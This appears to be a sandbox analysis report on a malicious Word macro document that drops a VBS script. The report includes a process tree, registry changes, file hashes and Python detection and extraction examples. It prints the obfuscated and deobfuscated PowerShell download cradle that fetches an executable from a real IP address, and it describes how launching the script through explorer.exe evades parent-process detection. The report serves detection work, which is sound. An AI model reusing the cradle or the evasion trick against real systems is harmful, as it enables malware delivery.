General
Target

cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm

Filesize

89KB

Completed

21-05-2022 12:29

Task

behavioral1

Score
10/10
MD5

b52f6306e6c5af7bd87fab6f32a937b9

SHA1

e7043e9907b332b9039eeb4487959d10e05d2dc0

SHA256

cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4

SHA512

0f5212be7b3294cb4b86e4f884f9b750a056c34ab9d9df040481d2244659ee2c79c084747ed5cf056ae9d4d3d35563b1901dacfbec464a20ea466029916cc9cb

Malware Config

Extracted

Language    ps1
Status      Deobfuscated
Type        exe.dropper
URLs        http://62.108.35.164/api.php

Signatures 14

Tactics observed: Defense Evasion, Discovery
  • Process spawned unexpected child process
    explorer.exe

    Description

    This typically indicates the parent process was compromised via an exploit or macro. In this run the macro launches explorer.exe (PID 1744, the SysWOW64 copy) with the dropped script C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs as its argument. A new explorer instance hands such a request to the already-running shell, which is why WScript.exe (PID 1324) appears under the COM-activated C:\Windows\explorer.exe (PID 268) in the process tree rather than under WINWORD.EXE: the parent chain back to the document is broken at this step, so detections that only look for Office spawning a script host will miss it.

    Reported IOCs

    description | pid | pid_target | process | target process
    Parent C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE is not expected to spawn this process | 1744 | 1624 | explorer.exe | WINWORD.EXE
  • Blocklisted process makes network request
    powershell.exe

    Reported IOCs

    flow | pid | process
    3 | 1928 | powershell.exe

    The request targets http://62.108.35.164/api.php (see the Malware Config block and the powershell.exe command line under Processes). The file it was meant to save, C:\AsusSupport\Kilskhdeuyrg.exe, does not appear under Downloads and the Network section of this report is empty, so the second stage was not obtained in this run.
  • Drops file in System32 directory
    powershell.exe

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | powershell.exe

    The reported path is PowerShell's own Start Menu shortcut with an unexpanded %ProgramData% token prepended to System32; it is an artifact of powershell.exe starting up, not the payload drop. The drop location this sample actually uses is C:\AsusSupport\ (see the command lines under Processes and the .cmd file under Downloads).
  • Drops file in Windows directory
    WINWORD.EXE

    Reported IOCs

    description | ioc | process
    File opened for modification | C:\Windows\Debug\WIA\wiatrace.log | WINWORD.EXE

    wiatrace.log is the Windows Image Acquisition trace file and is routinely written by Office processes in normal use; on its own it carries little signal.
  • Enumerates physical storage devices

    Description

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

    This is the sandbox's generic description for the signature. The report attributes no process or IOC to it, and the only payload stage observed is a file download, so it is not evidence of encryption activity in this run.

    TTPs

    System Information Discovery
  • Office loads VBA resources, possible macro or embedded object present
  • Delays execution with timeout.exe
    timeout.exe

    Reported IOCs

    pid | process
    1968 | timeout.exe
  • Modifies Internet Explorer settings
    WINWORD.EXE

    TTPs

    Modify Registry

    Reported IOCs

    description | ioc | process
    Set value (int) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\Contexts = "55" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\ONBttnIE.dll/105" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\Se&nd to OneNote | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\ = "res://C:\\PROGRA~2\\MICROS~1\\Office14\\EXCEL.EXE/3000" | WINWORD.EXE
    Set value (int) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\MenuExt\E&xport to Microsoft Excel\Contexts = "1" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000\Software\Microsoft\Internet Explorer\Toolbar\ShowDiscussionButton = "Yes" | WINWORD.EXE
  • Modifies registry class
    WINWORD.EXE

    The interface names below (IMdcCombo, _UserForm, FormEvents, WHTMLControlEvents and so on) are the MSForms/VBA control interfaces that Word registers when it loads the VBA runtime. They are consistent with macro execution in this run, not with persistence.

    Reported IOCs

    description | ioc | process
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{8BD21D53-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcOptionButton" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080}\ = "Pages" | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{5512D11B-5CC6-11CF-8D67-00AA00BDCE1D}\ = "IWHTMLText" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{8BD21D62-EC42-11CE-9E0D-00AA006002F3}\ = "MdcToggleButtonEvents" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{79176FB2-B7F2-11CE-97EF-00AA006D2776} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{04598FC7-866C-11CF-AB7C-00AA00C08FCF}\ = "Controls" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcCombo" | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{79176FB3-B7F2-11CE-97EF-00AA006D2776}\ = "ISpinbutton" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{5512D123-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{47FF8FE3-6198-11CF-8CE8-00AA006CB389} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8A683C90-BA84-11CF-8110-00A0C9030074}\ = "IReturnSingle" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B} | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{5512D11F-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389} | WINWORD.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{7720E078-D4F5-4A06-B8DB-019B779A7D5F}\2.0 | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{82B02371-B5BC-11CF-810F-00A0C9030074}\ = "IReturnBoolean" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{8BD21D33-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8BD21D52-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F}\ = "MultiPageEvents" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{4C5992A5-6926-101B-9992-00000B65C6F9} | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{CF3F94A0-F546-11CE-9BCE-00AA00608E01} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8BD21D13-EC42-11CE-9E0D-00AA006002F3}\ = "IMdcText" | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{7B020EC2-AF6C-11CE-9F46-00AA00574A4F}\ = "ScrollbarEvents" | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{47FF8FE0-6198-11CF-8CE8-00AA006CB389} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents9" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{7B020EC8-AF6C-11CE-9F46-00AA00574A4F} | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\TypeLib\{7720E078-D4F5-4A06-B8DB-019B779A7D5F}\2.0\0 | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8BD21D32-EC42-11CE-9E0D-00AA006002F3}\ = "MdcComboEvents" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{04598FC6-866C-11CF-AB7C-00AA00C08FCF} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{04598FC8-866C-11CF-AB7C-00AA00C08FCF}\ = "_UserForm" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{9A4BBF53-4E46-101B-8BBD-00AA003E3B29} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{5B9D8FC8-4A71-101B-97A6-00000B65C08B}\ = "FormEvents" | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{4C599243-6926-101B-9992-00000B65C6F9}\ = "IImage" | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8BD21D22-EC42-11CE-9E0D-00AA006002F3}\ = "MdcListEvents" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{944ACF93-A1E6-11CE-8104-00AA00611080} | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{978C9E22-D4B0-11CE-BF2D-00AA003F40D0} | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{796ED650-5FE9-11CF-8D68-00AA00BDCE1D} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{47FF8FE1-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents2" | WINWORD.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{7720E078-D4F5-4A06-B8DB-019B779A7D5F}\2.0\FLAGS | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074} | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{5512D119-5CC6-11CF-8D67-00AA00BDCE1D} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{47FF8FE2-6198-11CF-8CE8-00AA006CB389}\ = "WHTMLControlEvents3" | WINWORD.EXE
    Key created | \REGISTRY\MACHINE\SOFTWARE\Classes\TypeLib\{7720E078-D4F5-4A06-B8DB-019B779A7D5F}\2.0\0 | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{82B02370-B5BC-11CF-810F-00A0C9030074} | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{92E11A03-7358-11CE-80CB-00AA00611080} | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{EC72F590-F375-11CE-B9E8-00AA006B1A69} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{8A683C91-BA84-11CF-8110-00A0C9030074}\ = "IReturnEffect" | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{7B020EC1-AF6C-11CE-9F46-00AA00574A4F} | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Interface\{7B020EC7-AF6C-11CE-9F46-00AA00574A4F} | WINWORD.EXE
    Key created | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{47FF8FE8-6198-11CF-8CE8-00AA006CB389} | WINWORD.EXE
    Set value (str) | \REGISTRY\USER\S-1-5-21-1819626980-2277161760-1023733287-1000_CLASSES\Wow6432Node\Interface\{5CEF5613-713D-11CE-80C9-00AA00611080}\ = "IPage" | WINWORD.EXE
  • Suspicious behavior: AddClipboardFormatListener
    WINWORD.EXE

    Reported IOCs

    pid | process
    1624 | WINWORD.EXE
  • Suspicious behavior: EnumeratesProcesses
    powershell.exe

    Reported IOCs

    pid | process
    1928 | powershell.exe
  • Suspicious use of AdjustPrivilegeToken
    powershell.exe

    Reported IOCs

    description | pid | process
    Token: SeDebugPrivilege | 1928 | powershell.exe
  • Suspicious use of SetWindowsHookEx
    WINWORD.EXE

    Reported IOCs

    pid | process
    1624 | WINWORD.EXE
    1624 | WINWORD.EXE
  • Suspicious use of WriteProcessMemory
    WINWORD.EXE, explorer.exe, WScript.exe, cmd.exe

    Each row is a process launch (the parent writes into the new child's address space as part of creating it), so these edges reproduce the process tree below. Note the hand-off: WINWORD.EXE writes to the explorer.exe it spawned (PID 1744), but WScript.exe is written to by the COM-activated C:\Windows\explorer.exe (PID 268), which the report shows as a separate root.

    Reported IOCs

    description | pid | process | target process | count
    PID 1624 wrote to memory of 1744 | 1624 | WINWORD.EXE | explorer.exe | 4
    PID 268 wrote to memory of 1324 | 268 | explorer.exe | WScript.exe | 3
    PID 1324 wrote to memory of 1488 | 1324 | WScript.exe | cmd.exe | 3
    PID 1488 wrote to memory of 1928 | 1488 | cmd.exe | powershell.exe | 3
    PID 1488 wrote to memory of 1968 | 1488 | cmd.exe | timeout.exe | 3
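The signatures above are parent/child and command-line anomalies, which is exactly what an endpoint rule keys on. The following is an added example and not part of the sandbox report: it rebuilds the run's process-creation events as constructed records (the PIDs, images and command lines are the ones listed under Processes; the parent PIDs of WINWORD.EXE and of the COM-activated C:\Windows\explorer.exe are not in the report and are set to 0) and runs four rules over them. It also walks the recorded ancestry of powershell.exe to show that the chain stops at explorer.exe and never reaches the document, which is the detection gap the explorer.exe launch creates. The rule names, allowlists and record layout are this example's own assumptions, not any product's schema.

```python
import re
from dataclasses import dataclass
from ntpath import basename


@dataclass(frozen=True)
class ProcEvent:
    """One process-creation record (Sysmon Event ID 1 style; fields are this example's own)."""
    pid: int
    ppid: int
    image: str
    cmdline: str


# Constructed from the report's Processes list: same PIDs, images and command lines.
# ppid 0 marks a parent the report does not record (assumption of this example).
EVENTS = [
    ProcEvent(1624, 0, r"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE",
              r'"C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n '
              r'"C:\Users\Admin\AppData\Local\Temp\cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm"'),
    ProcEvent(1744, 1624, r"C:\Windows\SysWOW64\explorer.exe",
              r"explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"),
    ProcEvent(268, 0, r"C:\Windows\explorer.exe",
              r"C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding"),
    ProcEvent(1324, 268, r"C:\Windows\System32\WScript.exe",
              r'"C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"'),
    ProcEvent(1488, 1324, r"C:\Windows\System32\cmd.exe",
              r'cmd /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "'),
    ProcEvent(1928, 1488, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"""POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://62.108.35.164/api.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')"""),
    ProcEvent(1968, 1488, r"C:\Windows\system32\timeout.exe", "TIMEOUT /T 10"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe"}
SHELLS = {"cmd.exe", "powershell.exe"}
SCRIPT_EXT = re.compile(r"\.(vbs|vbe|js|jse|wsf|cmd|bat|ps1|hta)\b", re.I)
PS_DOWNLOAD = re.compile(r"downloadfile|downloadstring|invoke-webrequest|\biwr\b|net\.webclient", re.I)


def strip_quotes(cmdline: str) -> str:
    """powershell.exe drops unescaped double quotes from its argument string, so match on the
    view the interpreter sees: "Dow"nloadFile" becomes DownloadFile."""
    return cmdline.replace('"', "")


def evaluate(events):
    """Return (rule, pid, image name) tuples for every record that trips a rule."""
    by_pid = {e.pid: e for e in events}
    alerts = []
    for e in events:
        name = basename(e.image).lower()
        parent = by_pid.get(e.ppid)
        pname = basename(parent.image).lower() if parent else ""
        if pname in OFFICE_APPS:                       # any child of an Office app
            alerts.append(("office_app_spawns_child", e.pid, name))
        if name == "explorer.exe" and SCRIPT_EXT.search(e.cmdline):
            alerts.append(("explorer_used_as_script_launcher", e.pid, name))
        if pname in SCRIPT_HOSTS and name in SHELLS:   # wscript/cscript -> cmd/powershell
            alerts.append(("script_host_spawns_shell", e.pid, name))
        if name == "powershell.exe" and PS_DOWNLOAD.search(strip_quotes(e.cmdline)):
            alerts.append(("powershell_download_cradle", e.pid, name))
    return alerts


def ancestry(events, pid):
    """Image names from pid up to the last recorded ancestor, following ppid links."""
    by_pid = {e.pid: e for e in events}
    chain, seen = [], set()
    while pid in by_pid and pid not in seen:
        seen.add(pid)
        chain.append(basename(by_pid[pid].image))
        pid = by_pid[pid].ppid
    return chain


if __name__ == "__main__":
    for rule, pid, name in evaluate(EVENTS):
        print(f"{rule:36} pid={pid:<5} {name}")
    print("powershell.exe ancestry:", " <- ".join(ancestry(EVENTS, 1928)))
```

The ancestry walk is the point to take away: from powershell.exe (PID 1928) the recorded parents are cmd.exe, WScript.exe and then C:\Windows\explorer.exe, so a rule that only fires on "Office app is an ancestor of a script host" sees nothing here; the explorer.exe-with-script-argument rule is what links the two halves.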
Processes 7
  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\cd580936ca0b3f64311194b22355b1eee4148c3a26ca831fea9dda5ca748aba4.docm"
    Drops file in Windows directory
    Modifies Internet Explorer settings
    Modifies registry class
    Suspicious behavior: AddClipboardFormatListener
    Suspicious use of SetWindowsHookEx
    Suspicious use of WriteProcessMemory
    PID:1624
    • C:\Windows\SysWOW64\explorer.exe
      explorer.exe C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
      Process spawned unexpected child process
      PID:1744
  • C:\Windows\explorer.exe
    C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding
    Suspicious use of WriteProcessMemory
    PID:268
    • C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs"
      Suspicious use of WriteProcessMemory
      PID:1324
      • C:\Windows\System32\cmd.exe
        cmd /c ""C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd" "
        Suspicious use of WriteProcessMemory
        PID:1488
        • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
          POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://62.108.35.164/api.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')
          Deobfuscated (powershell.exe discards the unescaped double quotes while parsing its arguments, so the split keywords reassemble): (New-Object Net.WebClient).DownloadFile('http://62.108.35.164/api.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')
          Blocklisted process makes network request
          Drops file in System32 directory
          Suspicious behavior: EnumeratesProcesses
          Suspicious use of AdjustPrivilegeToken
          PID:1928
        • C:\Windows\system32\timeout.exe
          TIMEOUT /T 10
          Delays execution with timeout.exe
          PID:1968
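The Malware Config block at the top of the report (Language ps1, Deobfuscated, exe.dropper, one URL) and the powershell.exe command line above are two views of the same thing. The following is an added example, not part of the report and not any sandbox's extractor: a small model of the CommandLineToArgvW quoting rules that powershell.exe's argument parsing follows (unescaped double quotes toggle quoting and are removed, backslashes are literal unless they precede a quote), applied to the recorded command line to recover the script text, followed by a regex that pulls the URL and drop path out of the DownloadFile call. The field names of the returned config and the defang helper are this example's own assumptions.

```python
import re

# Command line recorded for powershell.exe (PID 1928) in the report.
OBFUSCATED = r"""POWerShell ("Ne"w-Object Net.WebClient")"."Dow"nloadFile"('"http://62.108.35.164/api.php', 'C:\AsusSupport\Kilskhdeuyrg.exe')"""

DOWNLOAD_CALL = re.compile(r"\.DownloadFile\(\s*'([^']+)'\s*,\s*'([^']+)'\s*\)", re.I)


def win_argv(cmdline: str) -> list:
    """Split a Windows command line with (simplified) CommandLineToArgvW rules.

    Whitespace separates arguments outside quotes; an unescaped double quote toggles
    quoting and is dropped; 2n backslashes before a quote become n backslashes, 2n+1
    become n backslashes plus a literal quote; other backslashes are literal.
    """
    args, cur, in_quotes, have_arg = [], [], False, False
    i, n = 0, len(cmdline)
    while i < n:
        c = cmdline[i]
        if c == "\\":
            j = i
            while j < n and cmdline[j] == "\\":
                j += 1
            count = j - i
            if j < n and cmdline[j] == '"':
                cur.append("\\" * (count // 2))
                if count % 2 == 1:          # odd run: the quote is literal
                    cur.append('"')
                    have_arg = True
                    i = j + 1
                    continue
                i = j                       # even run: the quote toggles below
                continue
            cur.append("\\" * count)        # backslashes not before a quote are literal
            have_arg = True
            i = j
            continue
        if c == '"':
            in_quotes = not in_quotes
            have_arg = True                 # "" still yields an (empty) argument
            i += 1
            continue
        if c in " \t" and not in_quotes:
            if have_arg:
                args.append("".join(cur))
                cur, have_arg = [], False
            i += 1
            continue
        cur.append(c)
        have_arg = True
        i += 1
    if have_arg:
        args.append("".join(cur))
    return args


def ps_script_from_cmdline(cmdline: str) -> str:
    """powershell.exe joins its positional arguments with spaces to form the script text."""
    return " ".join(win_argv(cmdline)[1:])


def defang(url: str) -> str:
    """Make an indicator safe to paste into a report (example helper, not a standard)."""
    return re.sub(r"^http", "hxxp", url).replace(".", "[.]", url.count(".") - url.count("/") * 0)


def extract_config(cmdline: str) -> dict:
    """Recover the dropper config (URL and drop path) from an obfuscated command line."""
    script = ps_script_from_cmdline(cmdline)
    m = DOWNLOAD_CALL.search(script)
    if not m:
        return {"language": "ps1", "type": None, "script": script, "urls": [], "drop_path": None}
    return {
        "language": "ps1",
        "type": "exe.dropper",
        "script": script,
        "urls": [m.group(1)],
        "urls_defanged": [defang(m.group(1))],
        "drop_path": m.group(2),
    }


if __name__ == "__main__":
    for k, v in extract_config(OBFUSCATED).items():
        print(f"{k:14} {v}")
```

Running it against the recorded command line yields the same URL the report lists under Malware Config and the drop path C:\AsusSupport\Kilskhdeuyrg.exe, and the reassembled script matches the deobfuscated line given under Processes. The quote trick only defeats string matching on the raw command line; anything that parses the arguments the way powershell.exe does sees the plain cradle.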
Network
MITRE ATT&CK Matrix

Defense Evasion: Modify Registry (T1112)
Discovery: System Information Discovery (T1082)
Downloads
  • C:\AsusSupport\KreuitrsfYRgryFVFt5.cmd
    MD5     197fd11428deaf8779c40b8aee37c023
    SHA1    66d053c6349a994301ba6ec562c7e659f6e60e40
    SHA256  7ede0b864739e9a03678ef876fb0b218b87a7d15f89b2a280989024b739deaf8
    SHA512  ab9b7ad1502532ed065bfa4bcc9e559d3a92bc9be3b46d24b1ba5a32ff7f58f7afa7431314435f434e025f36a8b4272d2a5a3ee4fbfdbeae560f809f978fcfc4
  • C:\ProgramData\OIUTFuy
    MD5     12a0751c89b3b618b7c91cee7a231878
    SHA1    2d546c942a6626826dc1d76d752cb6bb67546a94
    SHA256  c9a5966dac467eaafd2848273ad734127ba965224225a7e56a02113a1af571bc
    SHA512  aab37a468a8ade701a7c21042df0bca8f58c37223dbf2709285cac863a16b98085f66bd9add1c2480cbdf86781671f1589e4f37b472398de02b1d9dde8ee5fd3
  • C:\ProgramData\jKLMJKGtftftyJHGFTYDA.vbs
    MD5     d940788959fad6d9ec52674997f04457
    SHA1    c784384517d2c206c5423a8d58dee5d9ca9c6ffb
    SHA256  46b2da0c04f3b7edb5ab3c1280904dbc645fca003e80a3390e483bde1b80a646
